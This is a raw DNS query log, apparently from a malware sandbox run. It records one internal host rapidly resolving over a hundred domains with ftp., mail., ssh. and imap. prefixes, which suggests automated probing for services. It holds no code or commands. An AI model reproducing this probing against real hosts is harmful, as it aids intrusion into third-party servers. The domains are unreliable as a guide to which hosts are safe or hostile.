                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.412821054 CET192.168.2.61.1.1.10x2627Standard query (0)www.frametalent.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.413327932 CET192.168.2.61.1.1.10xd9ceStandard query (0)bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.416474104 CET192.168.2.61.1.1.10x93a6Standard query (0)noxnoir.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.416800976 CET192.168.2.61.1.1.10x6b35Standard query (0)egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.420672894 CET192.168.2.61.1.1.10x22d8Standard query (0)ftp.cznkqhnq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.421184063 CET192.168.2.61.1.1.10x54a4Standard query (0)ftp.bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.422141075 CET192.168.2.61.1.1.10xae1cStandard query (0)topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.452162027 CET192.168.2.61.1.1.10xe780Standard query (0)elseti.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.452559948 CET192.168.2.61.1.1.10x116bStandard query (0)euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.453231096 CET192.168.2.61.1.1.10xd209Standard query (0)ftp.topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.454703093 CET192.168.2.61.1.1.10xe11Standard query (0)aopcgaming.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.459856987 CET192.168.2.61.1.1.10x70a3Standard query (0)my-bingo-games.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.464732885 CET192.168.2.61.1.1.10xfc14Standard query (0)ftp.bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.470890999 CET192.168.2.61.1.1.10x6421Standard query (0)kidj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.472937107 CET192.168.2.61.1.1.10xd49Standard query (0)ftp.erofeev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.480123043 CET192.168.2.61.1.1.10x7e8dStandard query (0)ftp.euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.481710911 CET192.168.2.61.1.1.10x4c14Standard query (0)mail.tomsknetruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.537539959 CET192.168.2.61.1.1.10xccc8Standard query (0)www.attineos-cyber.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.943717957 CET192.168.2.61.1.1.10xd9ceStandard query (0)bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.943717957 CET192.168.2.61.1.1.10x6b35Standard query (0)egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.944214106 CET192.168.2.61.1.1.10xae1cStandard query (0)topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.000874996 CET192.168.2.61.1.1.10xa3e4Standard query (0)ftp.kidj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.002363920 CET192.168.2.61.1.1.10x1ab6Standard query (0)ftp.elseti.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.012427092 CET192.168.2.61.1.1.10xed4eStandard query (0)ftp.egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.258745909 CET192.168.2.61.1.1.10xc522Standard query (0)www.manizan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.259682894 CET192.168.2.61.1.1.10x7687Standard query (0)ftp.elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.276844025 CET192.168.2.61.1.1.10x9f79Standard query (0)www.pfprojekt.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.281295061 CET192.168.2.61.1.1.10x875fStandard query (0)mail.elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.282448053 CET192.168.2.61.1.1.10x4031Standard query (0)mail.winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.282448053 CET192.168.2.61.1.1.10xa821Standard query (0)ftp.winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.632415056 CET192.168.2.61.1.1.10xc522Standard query (0)www.manizan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.632416010 CET192.168.2.61.1.1.10x9f79Standard query (0)www.pfprojekt.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.687046051 CET192.168.2.61.1.1.10xd388Standard query (0)er.styggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.687482119 CET192.168.2.61.1.1.10x534Standard query (0)joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.687650919 CET192.168.2.61.1.1.10x91fdStandard query (0)ftp.yahoogabes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.688002110 CET192.168.2.61.1.1.10xe952Standard query (0)devbreeze.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.688283920 CET192.168.2.61.1.1.10xb885Standard query (0)exmur.nia.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.688647032 CET192.168.2.61.1.1.10x927fStandard query (0)ftp.er.styggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.688647032 CET192.168.2.61.1.1.10x8ca4Standard query (0)ftp.exmur.nia.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.689018011 CET192.168.2.61.1.1.10x437Standard query (0)ftp.condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.689424038 CET192.168.2.61.1.1.10x3cb7Standard query (0)mail.rabco.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.689610004 CET192.168.2.61.1.1.10x155Standard query (0)mlk546gabr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.689970016 CET192.168.2.61.1.1.10xdfa7Standard query (0)brevesdunsoir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.690337896 CET192.168.2.61.1.1.10x607fStandard query (0)r2husers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.690901041 CET192.168.2.61.1.1.10x3dc5Standard query (0)mail.devbreeze.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.691616058 CET192.168.2.61.1.1.10x4e1eStandard query (0)mail.bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.691616058 CET192.168.2.61.1.1.10x41a7Standard query (0)ftp.brevesdunsoir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.709115028 CET192.168.2.61.1.1.10x66ecStandard query (0)assiri.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.101059914 CET192.168.2.61.1.1.10x437Standard query (0)ftp.condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.119462013 CET192.168.2.61.1.1.10x963eStandard query (0)ftp.mlk546gabr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.121387005 CET192.168.2.61.1.1.10x7182Standard query (0)yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.125597954 CET192.168.2.61.1.1.10x58fcStandard query (0)princessmonty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.127423048 CET192.168.2.61.1.1.10x5e16Standard query (0)rabco.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.127687931 CET192.168.2.61.1.1.10x583Standard query (0)goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.127981901 CET192.168.2.61.1.1.10x4688Standard query (0)yahoogabes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.129801035 CET192.168.2.61.1.1.10xa778Standard query (0)bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.133872032 CET192.168.2.61.1.1.10x8f9cStandard query (0)ftp.devbreeze.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.162461042 CET192.168.2.61.1.1.10x75f2Standard query (0)ftp.goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.164088011 CET192.168.2.61.1.1.10xf7d9Standard query (0)ftp.rabco.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.164357901 CET192.168.2.61.1.1.10x3f84Standard query (0)cznkqhnq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.195194960 CET192.168.2.61.1.1.10xfc9cStandard query (0)ftp.yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.230452061 CET192.168.2.61.1.1.10xa201Standard query (0)ftp.r2husers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.233752966 CET192.168.2.61.1.1.10xdef6Standard query (0)llefigaro.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.244059086 CET192.168.2.61.1.1.10x3715Standard query (0)ftp.assiri.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.273507118 CET192.168.2.61.1.1.10x480Standard query (0)mail.er.styggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.445887089 CET192.168.2.61.1.1.10xfbd7Standard query (0)condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.476526022 CET192.168.2.61.1.1.10x7182Standard query (0)yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.490987062 CET192.168.2.61.1.1.10x3c67Standard query (0)mail.kidj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.531392097 CET192.168.2.61.1.1.10xfc9cStandard query (0)ftp.yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.550333977 CET192.168.2.61.1.1.10xc0ddStandard query (0)mail.aopcgaming.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.550576925 CET192.168.2.61.1.1.10x57ceStandard query (0)ftp.aopcgaming.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.601459980 CET192.168.2.61.1.1.10x3715Standard query (0)ftp.assiri.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.602900028 CET192.168.2.61.1.1.10x43a0Standard query (0)mail.noxnoir.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.603173971 CET192.168.2.61.1.1.10x5b7Standard query (0)ftp.noxnoir.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.634427071 CET192.168.2.61.1.1.10x2c07Standard query (0)mail.elseti.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.674817085 CET192.168.2.61.1.1.10xc522Standard query (0)www.manizan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.677365065 CET192.168.2.61.1.1.10xa0fbStandard query (0)mail.mail.tomsknetruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.678174019 CET192.168.2.61.1.1.10x3ee7Standard query (0)mail.erofeev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.172489882 CET192.168.2.61.1.1.10x1cccStandard query (0)mail.bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.174700022 CET192.168.2.61.1.1.10x27e7Standard query (0)mail.egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.175395012 CET192.168.2.61.1.1.10x34f9Standard query (0)mail.topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.224801064 CET192.168.2.61.1.1.10x4db1Standard query (0)mail.euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.225841045 CET192.168.2.61.1.1.10x4a01Standard query (0)mail.joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.225841045 CET192.168.2.61.1.1.10x2c9fStandard query (0)mail.brevesdunsoir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.771861076 CET192.168.2.61.1.1.10xc860Standard query (0)attineos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.824346066 CET192.168.2.61.1.1.10x180cStandard query (0)mail.mlk546gabr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.880755901 CET192.168.2.61.1.1.10x3cd3Standard query (0)mail.assiri.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.923528910 CET192.168.2.61.1.1.10xf368Standard query (0)mail.princessmonty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.945777893 CET192.168.2.61.1.1.10x150bStandard query (0)mail.my-bingo-games.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.027873993 CET192.168.2.61.1.1.10x9deStandard query (0)mail.cznkqhnq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.112457037 CET192.168.2.61.1.1.10x7628Standard query (0)mail.goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.317956924 CET192.168.2.61.1.1.10x4716Standard query (0)ssh.erofeev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.322170973 CET192.168.2.61.1.1.10xb670Standard query (0)ssh.euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.297591925 CET192.168.2.61.1.1.10x271bStandard query (0)mail.yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.507253885 CET192.168.2.61.1.1.10x46cfStandard query (0)elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.508802891 CET192.168.2.61.1.1.10x71fcStandard query (0)bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.511253119 CET192.168.2.61.1.1.10x64ccStandard query (0)erofeev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.511253119 CET192.168.2.61.1.1.10xe881Standard query (0)ssh.bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.605546951 CET192.168.2.61.1.1.10xff39Standard query (0)ssh.elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.605546951 CET192.168.2.61.1.1.10x3bdcStandard query (0)aopcgaming.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.605715990 CET192.168.2.61.1.1.10xf2faStandard query (0)egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.608074903 CET192.168.2.61.1.1.10x63e8Standard query (0)ssh.egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.620836020 CET192.168.2.61.1.1.10xef6dStandard query (0)topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.620836020 CET192.168.2.61.1.1.10x40aeStandard query (0)ssh.topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.620836020 CET192.168.2.61.1.1.10x13e4Standard query (0)mail.condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.628832102 CET192.168.2.61.1.1.10xd3cbStandard query (0)elseti.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.629677057 CET192.168.2.61.1.1.10x1856Standard query (0)ftp.erofeev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.629677057 CET192.168.2.61.1.1.10x562aStandard query (0)kidj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.629677057 CET192.168.2.61.1.1.10xc854Standard query (0)noxnoir.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.630672932 CET192.168.2.61.1.1.10x725Standard query (0)euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.631118059 CET192.168.2.61.1.1.10x85faStandard query (0)ftp.kidj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.631118059 CET192.168.2.61.1.1.10x26f8Standard query (0)ssh.kidj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.631443024 CET192.168.2.61.1.1.10x129dStandard query (0)ssh.winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.632353067 CET192.168.2.61.1.1.10xc2fcStandard query (0)ftp.elseti.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.646955967 CET192.168.2.61.1.1.10x271bStandard query (0)mail.yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.959603071 CET192.168.2.61.1.1.10x18f6Standard query (0)brevesdunsoir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.959603071 CET192.168.2.61.1.1.10x2252Standard query (0)ssh.joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.960073948 CET192.168.2.61.1.1.10xc7c5Standard query (0)mail.elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.960169077 CET192.168.2.61.1.1.10x4efbStandard query (0)mail.winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.961458921 CET192.168.2.61.1.1.10xf883Standard query (0)winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.963397980 CET192.168.2.61.1.1.10x85e1Standard query (0)joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.987409115 CET192.168.2.61.1.1.10x2115Standard query (0)devbreeze.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.987409115 CET192.168.2.61.1.1.10x3a6fStandard query (0)rabco.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.988039017 CET192.168.2.61.1.1.10x3db9Standard query (0)bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.988863945 CET192.168.2.61.1.1.10x69dcStandard query (0)er.styggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.293010950 CET192.168.2.61.1.1.10xfc81Standard query (0)mail.brevesdunsoir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.293268919 CET192.168.2.61.1.1.10x8dc7Standard query (0)mail.joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.293473959 CET192.168.2.61.1.1.10x7462Standard query (0)mail.egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.293647051 CET192.168.2.61.1.1.10xf06dStandard query (0)mail.bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.295259953 CET192.168.2.61.1.1.10xf48aStandard query (0)mail.topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.295259953 CET192.168.2.61.1.1.10x716Standard query (0)mail.euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.366853952 CET192.168.2.61.1.1.10x142cStandard query (0)ftp.winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.366853952 CET192.168.2.61.1.1.10x4764Standard query (0)ftp.egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.382991076 CET192.168.2.61.1.1.10x1250Standard query (0)ssh.condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.386873960 CET192.168.2.61.1.1.10x8321Standard query (0)ftp.bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.386873960 CET192.168.2.61.1.1.10x13fStandard query (0)ftp.elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.395986080 CET192.168.2.61.1.1.10xd5d2Standard query (0)mail.rabco.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.395986080 CET192.168.2.61.1.1.10x46aaStandard query (0)ftp.brevesdunsoir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.408164024 CET192.168.2.61.1.1.10x2307Standard query (0)mail.bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.411478996 CET192.168.2.61.1.1.10xb466Standard query (0)mail.devbreeze.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.411478996 CET192.168.2.61.1.1.10xf1feStandard query (0)ssh.mlk546gabr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.453870058 CET192.168.2.61.1.1.10xc8d3Standard query (0)ftp.er.styggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.455307007 CET192.168.2.61.1.1.10x4507Standard query (0)mail.er.styggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.455307007 CET192.168.2.61.1.1.10xf228Standard query (0)ssh.r2husers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.455307007 CET192.168.2.61.1.1.10xa9e1Standard query (0)ssh.er.styggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.455754042 CET192.168.2.61.1.1.10xf29Standard query (0)ftp.exmur.nia.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.456057072 CET192.168.2.61.1.1.10xd03dStandard query (0)ftp.yahoogabes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.456512928 CET192.168.2.61.1.1.10xba42Standard query (0)ssh.brevesdunsoir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.456777096 CET192.168.2.61.1.1.10xbb73Standard query (0)ftp.cznkqhnq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.457216978 CET192.168.2.61.1.1.10x5ec9Standard query (0)ssh.exmur.nia.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.457323074 CET192.168.2.61.1.1.10x6edaStandard query (0)ssh.assiri.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.493309021 CET192.168.2.61.1.1.10x1f81Standard query (0)ftp.aopcgaming.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.493309975 CET192.168.2.61.1.1.10x82eeStandard query (0)ftp.condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.493309975 CET192.168.2.61.1.1.10x8101Standard query (0)assiri.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.496372938 CET192.168.2.61.1.1.10xe772Standard query (0)mlk546gabr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.499341965 CET192.168.2.61.1.1.10x399aStandard query (0)mail.elseti.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.536073923 CET192.168.2.61.1.1.10x5c27Standard query (0)ssh.devbreeze.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.536310911 CET192.168.2.61.1.1.10xf975Standard query (0)my-bingo-games.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.536401987 CET192.168.2.61.1.1.10xef25Standard query (0)ssh.princessmonty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.536612034 CET192.168.2.61.1.1.10x972aStandard query (0)princessmonty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.537003994 CET192.168.2.61.1.1.10x67c5Standard query (0)ftp.devbreeze.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.537003994 CET192.168.2.61.1.1.10x79ceStandard query (0)yahoogabes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.537257910 CET192.168.2.61.1.1.10x5169Standard query (0)ssh.bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.537596941 CET192.168.2.61.1.1.10x59abStandard query (0)imap.goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.571841002 CET192.168.2.61.1.1.10x8c75Standard query (0)ssh.yahoogabes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.748872042 CET192.168.2.61.1.1.10x1a22Standard query (0)mail.aopcgaming.comA (IP address)IN (0x0001)false
